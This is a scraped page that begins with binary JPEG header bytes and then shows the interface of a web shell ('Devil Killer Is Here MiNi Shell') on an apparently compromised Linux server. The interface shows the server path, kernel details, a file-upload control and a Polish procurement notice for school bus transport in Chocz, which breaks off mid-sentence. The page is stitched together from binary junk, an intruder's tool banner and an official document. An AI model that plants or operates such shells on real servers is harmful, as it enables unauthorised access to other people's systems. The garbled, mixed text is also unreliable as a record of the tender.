JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241218/0066069101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowożenie i odwożenie dzieci do Zespołu szkół w Choczu na podstawie biletów miesięcznych w roku szkolnym 2024/25” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ W CHOCZU UL. MARII KONOPNICKIEJ 6 63-313 CHOCZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000265603</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Konopnickiej 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chocz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-313</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zschocz@ecentrum.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zschocz.szkolna.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowożenie i odwożenie dzieci do Zespołu szkół w Choczu na podstawie biletów miesięcznych w roku szkolnym 2024/25” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63583182-3f0f-4b39-b465-d4621897d50f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00660691</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-63583182-3f0f-4b39-b465-d4621897d50f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">a) poczty elektronicznej, e-mail zamawiającego: zschocz@ecentrum.pl ( z wyjątkiem<br/>złożenia oferty, którą należy złożyć tylko i wyłącznie za pośrednictwem platformy e-Zamówienia w zakładce Oferty/wnioski zgodnie z<br/>Rozdziałem 12 pkt 8 SWZ<br/>b) platformy e-Zamówienia za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” (FORMULARZE DO<br/>KOMUNIKACJI, które umożliwiają dołączenie załącznika do przesyłanej wiadomości),<br/>c) ePUAP dostępnego pod adresem: https://epuap.gov.pl/wps/portal, adres skrytki zamawiającego : /ZSChocz/SkrytkaESP<br/>(wypełniając formularz do komunikacji w miejscu „wpisz dane odbiorcy” należy wpisać: Zespół Szkół w Choczu, z wyjątkiem złożenia<br/>oferty, którą należy złożyć tylko i wyłącznie za pośrednictwem platformy e-Zamówienia w zakładce Oferty/wnioski zgodnie z<br/>Rozdziałem 12 pkt 8 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Możliwość korzystania w postępowaniu z FORMULARZY DO KOMUNIKACJI w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z FORMULARZY DO<br/>KOMUNIKACJI służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw.<br/>konta uproszczonego na Platformie e-Zamówienia.<br/>4. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem FORMULARZY DO KOMUNIKACJI wynosi 150 MB (wielkość ta<br/>dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>6. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. Tym samym wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego akceptuje stosowanie się do wytycznych w ww. dokumencie.<br/>7. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy<br/>e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą<br/>elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>8. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się: datę<br/>ich wpływu na skrzynkę odbiorczą e-mail zamawiającego, przekazania na platformę e-Zamówienia lub przekazanie na ePUAP (w<br/>zależności od sposobu komunikowania się).<br/>9. Postępowanie prowadzone jest w języku polskim i bez wyjątku wszystkie dokumenty i oświadczenia sporządzone w języku obcym<br/>przekazuje się wraz z tłumaczeniem na język polski.<br/>10. Pliki należy opatrzeć: podpisem zaufanym, kwalifikowanym podpisem elektronicznym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), zwanym dalej „RODO”, informuje, że:<br/>• administratorem Pani/Pana danych osobowych jest Zespół Szkół w Choczu, 63-313 Chocz, ul. M. Konopnickiej 6, tel.: (62) 7415-<br/>319, e-mail: zschocz@ecentrum.pl<br/>• administrator wyznaczył Inspektora Ochrony Danych, można się z nim skontaktować pod numerem telefonu 667 379 790 lub<br/>adresem e – mail: iodo_llachowicz@zschocz.p<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Dowożenie i odwożenie dzieci do Zespołu Szkół w Choczu na podstawie biletów<br/>miesięcznych”, prowadzonym w trybie podstawowym,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>zgodnie z zapisami ustawy Pzp,<br/>Ogłoszenie nr 2024/BZP 00642662 z dnia 2024-12-10<br/>2024-12-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>• Pani/Pana dane osobowe będą przechowywane zgodnie z zapisami ustawy Pzp,<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących, jest wymogiem ustawowym<br/>określonym w przepisach Pzp, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO,<br/>• posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,*<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO,**<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, ze przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>• nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit b, d lub e RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. C RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCh.331.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 140000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja w dni nauki szkolnej usługi: ”Dowożenie i odwożenie uczniów do Zespołu Szkół<br/>w Choczu na podstawie biletów miesięcznych” w<br/>okresie od 07 stycznia 2025 r do 19 grudnia 2025 r.<br/>2. Zamówienie publiczne obejmuje przewozy uczniów do Szkół z terenu gminy Chocz z miejsca zamieszkania (z<br/>przystanków<br/>wskazanych przez Zamawiającego) do siedziby szkoły oraz odwiezienie ich do miejsca zamieszkania (do przystanków<br/>wskazanych przez Zamawiającego) po zajęciach szkolnych zgodnie z przedstawionymi poniżej trasami dowozów. Podana<br/>liczba km nie uwzględnia dojazdu do przystanków początkowych i odjazdu z przystanków końcowych danej trasy, które<br/>zapewnia we własnym zakresie Wykonawca. Ogólna liczba km liczona zatem jest od momentu zabrania pierwszych<br/>pasażerów do momentu wysadzenia ostatnich.<br/>3. Zamawiający wymaga, aby przewozy szkolne realizowane były na trasach komunikacyjnych według rozkładu<br/>skorelowanego z godzinami rozpoczynania i zakończenia zajęć lekcyjnych wynikających z planu lekcji, który będzie<br/>realizowany w okresie obowiązywania umowy. Szczegółowe godziny przyjazdu i odjazdu zostaną przekazane Wykonawcy<br/>po podpisaniu umowy.<br/>4. Zamawiający wymaga, aby rozkłady jazdy na liniach komunikacyjnych w obrębie gminy Chocz były tak skonstruowane,<br/>aby umożliwiły uczniom także transport na rozpoczęcie<br/>i zakończenie roku szkolnego, rekolekcje, egzaminy itp.<br/>5. Liczba biletów miesięcznych w okresie realizacji zamówienia może ulec zmianie do 20% . W przypadku zwiększenia<br/>liczby dowożonych uczniów, Wykonawca musi zapewnić ich dowóz i odwóz na warunkach podanych w ofercie. Z tytułu<br/>zmniejszenia liczby dowożonych uczniów, Zamawiający nie przewiduje opłat z tego tytułu.<br/>6. Liczba uczniów jest prognozowana i może ulec zmianie w trakcie realizacji zamówienia.<br/>7. Wykonawca zobowiązany jest do dostarczenia biletów miesięcznych do siedziby Zamawiającego zgodnie z wykazem<br/>imiennym uczniom w terminie do 28 każdego<br/>miesiąca na kolejny miesiąc. Wszyscy uczniowie mają zostać dowiezieni na zajęcia na godzinę 800.<br/>8. Wykonawca zobowiązany jest w przypadku awarii autobusu do zapewnienia autobusu zastępczego we własnym zakresie<br/>i na własny koszt. Czas podstawienia autobusu zastępczego nie może być dłuższy niż 60 minut.<br/>9. Realizacja przedmiotu umowy odbywać się będzie środkami transportu przystosowanymi do przewozu dzieci i młodzieży<br/>szkolnej, spełniającymi wszystkie wymogi bezpieczeństwa związane z przewozem pasażerskim, o którym mowa w ustawie z<br/>dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2019r. poz. 2140 z późn. zm.) i ustawie z dnia 20 czerwca 1997 r.<br/>Prawo o ruchu drogowym, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>10. Pojazdy, którymi dysponować będzie Wykonawca w zakresie realizacji zadania, muszą spełniać warunki określone w<br/>obowiązujących przepisach, w szczególności ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. z 2021r.<br/>poz. 450 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków<br/>technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016r. poz. 2022 z późn. zm.).<br/>11. Wykonawca, z którym Zamawiający podpisze umowę na świadczenie usług musi posiadać zezwolenie na wykonywanie<br/>regularnych przewozów.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>12. Wykonawca jest zobowiązany ubezpieczyć autobusy, którymi realizowane jest zamówienie oraz pasażerów od<br/>wszelkich<br/>szkód powstałych podczas przewozu i pozostających w związku z przewozem.<br/>13. Dowozy i odwozy będą realizowane na podstawie imiennych miesięcznych biletów wydawanych osobom uprawnionym<br/>do przejazdu na podstawie imiennych wykazów uczniów przekazywanych przez dyrektora szkoły. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-07 do 2025-12-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wymaganych kryteriów .<br/> Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma <br/> maksymalną ilość punktów. Pozostałym wykonawcom, spełniającym wymagania kryterialne <br/> przypisana zostanie odpowiednio mniejsza ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>1) zdolność do występowania w obrocie gospodarczym<br/>zamawiający nie określa wymagań w tym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż posiada aktualną licencję na wykonywanie<br/>krajowego transportu drogowego lub zezwolenia na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia<br/>6 września 2001 r. o transporcie drogowym.<br/>Uwaga: w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek będzie spełniony<br/>jeżeli co najmniej jeden z wykonawców posiada aktualną licencję na wykonywanie krajowego transportu drogowego lub<br/>zezwolenia na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie<br/>drogowym.;<br/>3) zdolności technicznej lub zawodowej:<br/>a) w zakresie posiadania wiedzy i doświadczenia Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, świadczył lub świadczy należycie min. jedną usługę przewozu osób na rzecz szkoły przez okres minimum jednego<br/>roku szkolnego w ramach umowy/umów.<br/>Uwaga: warunek posiadania wiedzy i doświadczenia nie podlega sumowaniu, oznacza to, że w przypadku Wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia, Zamawiający wymaga aby jeden z Wykonawców wykazał w całości<br/>samodzielnie spełnienie w/w warunku;<br/>b) w zakresie posiadania potencjału osób skierowanych przez Wykonawcę do realizacji zamówienia, Zamawiający uzna<br/>warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje co najmniej: min. 1 kierowcą z odpowiednimi uprawnieniami<br/>do kierowania pojazdami tj. posiadającymi prawo jazdy do kierowania pojazdem/ami wykazanym/i przez Wykonawcę , min.<br/>Ogłoszenie nr 2024/BZP 00642662 z dnia 2024-12-10<br/>2024-12-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1 osobą pełnoletnią , która będzie sprawowała opiekę nad uczniami podczas dowożenia i odwożenia (ilość wykazanych<br/>osób zależy od ilości i wykazanych pojazdów przez Wykonawcę)<br/>- W przypadku składania oferty wspólnej, powyższy warunek Wykonawcy muszą spełniać łącznie.<br/>c) w zakresie posiadania potencjału technicznego, Zamawiający uzna ten warunek za spełniony, jeżeli:<br/>- Wykonawca zapewni taką liczbę pojazdów, która niezbędna jest do realizacji zamówienia,<br/>- W przypadku składania oferty wspólnej, powyższy warunek Wykonawcy muszą spełniać łącznie.<br/>4) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa wymagań w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale 6 pkt 3a SWZ, Wykonawca złoży wykaz usług wykonanych nie<br/>wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane,<br/>(załącznik nr 4 SWZ), z załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>2) w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale 6 pkt 3b swz, Wykonawca złoży wykaz osób, skierowanych<br/>przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia, niezbędnych do wykonania zamówienia publicznego,<br/>a 